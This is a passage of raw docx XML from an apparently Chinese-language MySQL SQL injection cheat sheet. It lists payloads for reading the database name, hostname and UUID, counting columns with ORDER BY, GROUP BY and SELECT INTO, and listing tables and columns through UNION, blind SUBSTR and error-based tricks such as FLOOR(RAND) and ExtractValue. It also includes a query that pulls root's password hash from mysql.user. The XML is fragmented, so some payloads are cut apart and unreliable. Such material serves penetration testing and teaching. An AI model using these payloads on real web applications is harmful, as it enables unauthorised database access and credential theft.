          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:before="30" w:after="30"/>
        <w:ind w:left="30" w:right="30"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier" w:cs="Courier"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier" w:cs="Courier"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>SELECT </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier" w:cs="Courier"/>
          <w:b/>
          <w:color w:val="CC0000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>current_user</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier" w:cs="Courier"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C91532" w:rsidRDefault="002F3109">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:before="30" w:after="30"/>
        <w:ind w:left="30" w:right="30"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier" w:cs="Courier"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier" w:cs="Courier"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>SELECT CONCAT_WS(0x3A, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier" w:cs="Courier"/>
          <w:b/>
          <w:color w:val="CC0000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>user</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier" w:cs="Courier"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier" w:cs="Courier"/>
          <w:b/>
          <w:color w:val="CC0000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>password</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier" w:cs="Courier"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>) FROM </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier" w:cs="Courier"/>
          <w:b/>
          <w:color w:val="CC0000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>mysql.user</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier" w:cs="Courier"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> WHERE user = 'root'-- (Privileged)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</w:pPr>
      <w:bookmarkStart w:id="24" w:name="_Toc32276_WPSOffice_Level1"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>六．数据库名称</w:t>
      </w:r>
      <w:bookmarkEnd w:id="24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tbl>
      <w:tblPr>
        <w:tblW w:w="58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4768"/>
      </w:tblGrid>
      <w:tr w:rsidR="00C91532">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10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表</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="47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eastAsia="宋体" w:hAnsi="Courier" w:cs="Courier"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>information_schema.schemata</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="Courier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" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="Courier"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>mysql.db</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C91532">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10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</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="47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schema_name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,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db</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C91532">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="105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当前数据库</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="47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database(), schema()</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00C91532" w:rsidRDefault="00C91532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7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database()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2F3109">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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schema_name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FROM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information_schema.schemata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2F3109">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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DISTINCT(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db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) FROM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mysql.db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</w:pPr>
      <w:bookmarkStart w:id="25" w:name="_Toc10701_WPSOffice_Level1"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>七．服务器主机名</w:t>
      </w:r>
      <w:bookmarkEnd w:id="25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widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:before="30" w:after="30"/>
        <w:ind w:left="30" w:right="30"/>
      </w:pPr>
      <w:bookmarkStart w:id="26" w:name="_Toc10523_WPSOffice_Level2"/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@@HOSTNAME</w:t>
      </w:r>
      <w:bookmarkEnd w:id="26"/>
    </w:p>
    <w:p w:rsidR="00C91532" w:rsidRDefault="00C91532">
      <w:pPr>
        <w:widowControl/>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
        </w:tabs>
        <w:spacing w:before="30" w:after="30"/>
        <w:ind w:right="30"/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9"/>
        </w:numPr>
        <w:spacing w:before="30" w:after="30"/>
        <w:ind w:left="30" w:right="30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@@hostname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27" w:name="_Toc10451_WPSOffice_Level1"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>八．服务器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27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通用唯一标识符是一个128位数字，其中最后12位数字是由接口MAC地址形成的</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C91532" w:rsidRDefault="002F3109">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:before="30" w:after="30"/>
        <w:ind w:right="30"/>
      </w:pPr>
      <w:bookmarkStart w:id="28" w:name="_Toc15560_WPSOffice_Level2"/>
      <w:proofErr w:type="gramStart"/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UUID()</w:t>
      </w:r>
      <w:bookmarkEnd w:id="28"/>
      <w:proofErr w:type="gramEnd"/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Output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：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C91532" w:rsidRDefault="002F3109">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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proofErr w:type="spellStart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aaaaaaaa-bbbb-cccc-dddd-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eeeeeeeeeeee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可以返回48位随机字符串，而不是某些操作系统上的MAC地址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29" w:name="_Toc538_WPSOffice_Level1"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>九．表格和栏目（表和列）</w:t>
      </w:r>
      <w:bookmarkEnd w:id="29"/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0" w:name="_Toc23577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1.确定列数</w:t>
      </w:r>
      <w:bookmarkEnd w:id="30"/>
    </w:p>
    <w:p w:rsidR="00C91532" w:rsidRDefault="002F3109">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11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  <w:t>GROUP/ORDER BY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GROUP/ORDER BY n+1;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/>
          <w:color w:val="333333"/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>一直递增这个数字，直到得到错误的响应为止。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/>
          <w:color w:val="333333"/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>尽管GROUPBY和ORDERBY在SQL中具有不同的功能，但它们都可以完全相同的方式用于确定查询中的列数。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  <w:t>给定查询</w:t>
      </w:r>
      <w:r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  <w:t xml:space="preserve"> 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  <w:t>SELECT username, password, permission FROM Users WHERE id = '{INJECTION POINT}';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C91532" w:rsidRDefault="00C91532">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="62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3480"/>
      </w:tblGrid>
      <w:tr w:rsidR="00C91532"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1' ORDER BY 1--+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</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C91532"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1' ORDER BY 2--+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</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C91532"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1' ORDER BY 3--+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真</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C91532"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1' ORDER BY 4--+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假-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查询仅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使用3列</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C91532"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-1' UNION SELECT 1,2,3--+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1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Error Based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GROUP/ORDER BY 1</w:t>
      </w:r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,2,3,4,5</w:t>
      </w:r>
      <w:proofErr w:type="gram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...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与前面的方法类似，如果启用错误显示，我们可以检查1列请求的列数。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给定查询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 xml:space="preserve"> SELECT username, password, permission FROM Users WHERE id = '{INJECTION POINT}'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C91532" w:rsidRDefault="00C91532">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="52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2535"/>
      </w:tblGrid>
      <w:tr w:rsidR="00C91532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1' GROUP BY 1,2,3,4,5--+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‘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group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语句’中未知列‘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’</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C91532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1' ORDER BY 1,2,3,4,5--+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C91532">
            <w:pPr>
              <w:widowControl/>
              <w:wordWrap w:val="0"/>
              <w:jc w:val="left"/>
              <w:textAlignment w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
            </w:pPr>
          </w:p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“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Order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子句”中未知列‘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eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>’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1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Error Based 2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SELECT ... INTO </w:t>
      </w:r>
      <w:proofErr w:type="spell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var_list</w:t>
      </w:r>
      <w:proofErr w:type="spell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, var_list1, var_list2...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如果启用错误显示，则此方法有效。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当注入点在限制子句之后，找到列数是有用的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1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给定查询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 xml:space="preserve"> SELECT permission FROM Users WHERE id = {INJECTION POINT};</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C91532" w:rsidRDefault="00C91532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</w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="58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760"/>
      </w:tblGrid>
      <w:tr w:rsidR="00C91532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-1 UNION SELECT 1 INTO @,@,@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使用的SELECT语句有不同的列数</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C91532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-1 UNION SELECT 1 INTO @,@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使用的SELECT语句有不同的列数</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C91532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-1 UNION SELECT 1 INTO @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无错误意味着查询使用1列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2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给定查询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 xml:space="preserve"> SELECT username, permission FROM Users limit 1,{INJECTION POINT};</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C91532" w:rsidRDefault="00C91532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</w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="70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5640"/>
      </w:tblGrid>
      <w:tr w:rsidR="00C91532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 INTO @,@,@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所使用的SELECT语句具有不同的列数。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C91532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 INTO @,@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无错误意味着查询使用2列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1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lastRenderedPageBreak/>
        <w:t>Error Based 3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AND (SELECT * FROM SOME_EXISTING_TABLE) = 1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如果您知道要查找的表名，并且启用了错误显示，则此操作有效。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它将返回表中的列数，而不是查询。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C91532" w:rsidRDefault="00C91532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给定查询</w:t>
      </w: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 xml:space="preserve"> SELECT permission FROM Users WHERE id = {INJECTION POINT};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54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2069"/>
      </w:tblGrid>
      <w:tr w:rsidR="00C91532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1 AND (SELECT * FROM Users) = 1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Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
                <w:color w:val="222222"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18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18"/>
                <w:szCs w:val="18"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>操作数应包含</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="Verdana"/>
                <w:color w:val="222222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Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="Verdana"/>
                <w:color w:val="222222"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>列（</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="Verdana"/>
                <w:color w:val="222222"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>s</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="Verdana"/>
                <w:color w:val="222222"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>）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2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1" w:name="_Toc10894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检索表</w:t>
      </w:r>
      <w:bookmarkEnd w:id="31"/>
    </w:p>
    <w:p w:rsidR="00C91532" w:rsidRDefault="002F3109">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13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Union</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C91532" w:rsidRDefault="002F3109">
      <w:pPr>
        <w:jc w:val="left"/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</w:pPr>
      <w:r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  <w:t>UNION SELECT GROUP_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r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  <w:t>CONCAT(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r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  <w:t xml:space="preserve">) FROM </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r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  <w:t>information_schema.tables</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="叶根友毛笔行书2.0版" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> WHERE version=10;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3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Blind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 xml:space="preserve">AND SELECT </w:t>
      </w:r>
      <w:proofErr w:type="gramStart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SUBSTR(</w:t>
      </w:r>
      <w:proofErr w:type="gram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 xml:space="preserve">table_name,1,1) FROM </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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information_schema.tables</w:t>
      </w:r>
      <w:proofErr w:type="spell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 xml:space="preserve"> &gt; 'A'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C91532" w:rsidRDefault="002F3109">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13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Error</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="845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AND(SELECT COUNT(*) FROM (SELECT 1 UNION SELECT null UNION SELECT !1)x GROUP BY CONCAT((SELECT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LIMIT 1),FLOOR(RAND(0)*2)))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(@:=1)||@ GROUP BY CONCAT((SELECT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LIMIT 1),!@) HAVING @||MIN(@:=0);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AND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ExtractValue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(1, CONCAT(0x5c, (SELECT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LIMIT 1)));-- Available in 5.1.5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 5的版本=10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2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2" w:name="_Toc18343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lastRenderedPageBreak/>
        <w:t>检索列</w:t>
      </w:r>
      <w:bookmarkEnd w:id="32"/>
    </w:p>
    <w:p w:rsidR="00C91532" w:rsidRDefault="002F3109">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14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Union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UNION SELECT GROUP_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart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CONCAT(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gram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column_name</w:t>
      </w:r>
      <w:proofErr w:type="spell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 xml:space="preserve">) FROM </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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information_schema.columns</w:t>
      </w:r>
      <w:proofErr w:type="spell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table_name</w:t>
      </w:r>
      <w:proofErr w:type="spell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tablename</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="Courier"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C91532" w:rsidRDefault="002F3109">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14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Blind</w:t>
      </w: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0"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">AND SELECT </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SUBSTR(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">column_name,1,1) FROM </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>information_schema.columns</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt; 'A'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C91532" w:rsidRDefault="002F3109">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14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Error</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="845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6"/>
      </w:tblGrid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AND(SELECT COUNT(*) FROM (SELECT 1 UNION SELECT null UNION SELECT !1)x GROUP BY CONCAT((SELECT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LIMIT 1),FLOOR(RAND(0)*2)))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(@:=1)||@ GROUP BY CONCAT((SELECT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LIMIT 1),!@) HAVING @||MIN(@:=0);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AND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ExtractValue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(1, CONCAT(0x5c, (SELECT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 xml:space="preserve"> LIMIT 1)));-- Available in MySQL 5.1.5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AND (1,2,3) = (SELECT * FROM SOME_EXISTING_TABLE UNION SELECT 1,2,3 LIMIT 1)-- Fixed in MySQL 5.1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AND (SELECT * FROM (SELECT * FROM SOME_EXISTING_TABLE JOIN SOME_EXISTING_TABLE b) a)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C91532">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="84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222222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222222"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>AND (SELECT * FROM (SELECT * FROM SOME_EXISTING_TABLE JOIN SOME_EXISTING_TABLE b USING (SOME_EXISTING_COLUMN)) a)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4"/>
        </w:numPr>
        <w:jc w:val="left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PROCEDURE ANALYSE()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C91532" w:rsidRDefault="002F3109">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="150" w:after="150"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="222222"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML0"/>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="Courier"/>
          <w:color w:val="222222"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t xml:space="preserve">PROCEDURE </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML0"/>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="Courier"/>
          <w:color w:val="222222"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>ANALYSE()</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd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widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:spacing w:before="30" w:after="30"/>
        <w:ind w:left="750" w:right="30"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorEastAsia"/>
          <w:iCs/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorEastAsia" w:hint="eastAsia"/>
          <w:iCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Web应用程序必须在注入到的SQL查询中显示所选列之一</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C91532" w:rsidRDefault="00C91532">
      <w:pPr>
        <w:widowControl/>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
        </w:tabs>
        <w:spacing w:before="30" w:after="30"/>
        <w:ind w:right="30"/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Style w:val="HTML0"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体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eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>给定查询</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML0"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体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Style w:val="HTML0"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>SELECT username, permission FROM Users WHERE id = 1;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C91532" w:rsidRDefault="00C91532">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rStyle w:val="HTML0"/>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="5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1590"/>
      </w:tblGrid>
      <w:tr w:rsidR="00C91532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 PROCEDURE ANALYSE()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获取第一列的名称</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C91532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 LIMIT 1,1 PROCEDURE ANALYSE()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获取第二列的名称</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C91532"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1 LIMIT 2,1 PROCEDURE ANALYSE()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获取第三列的名称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2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3" w:name="_Toc28130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lastRenderedPageBreak/>
        <w:t>一次检索多个表/列</w:t>
      </w:r>
      <w:bookmarkEnd w:id="33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widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:spacing w:before="30" w:after="30"/>
        <w:ind w:left="30" w:right="30"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier" w:cs="Courier"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr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SELECT (@) FROM (SELECT(@:=0x00),(SELECT (@) FROM (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information_schema.columns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) WHERE (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table_schema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&gt;=@) AND (@)IN (@:=CONCAT(@,0x0a,' [ ',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table_schema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,' ] &gt;',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table_name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,' &gt; ',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column_name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))))x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17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* FROM Users WHERE id = '-1' UNION SELECT 1, 2,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(SELECT (@) FROM (SELECT(@:=0x00),(SELECT (@) FROM (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information_schema.columns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 WHERE (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table_schema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&gt;=@) AND (@)IN (@:=CONCAT(@,0x0a,' [ ',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table_schema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,' ] &gt;',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table_name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,' &gt; ',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column_name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))))x)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, 4--+';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C91532" w:rsidRDefault="00C91532">
      <w:pPr>
        <w:widowControl/>
        <w:tabs>
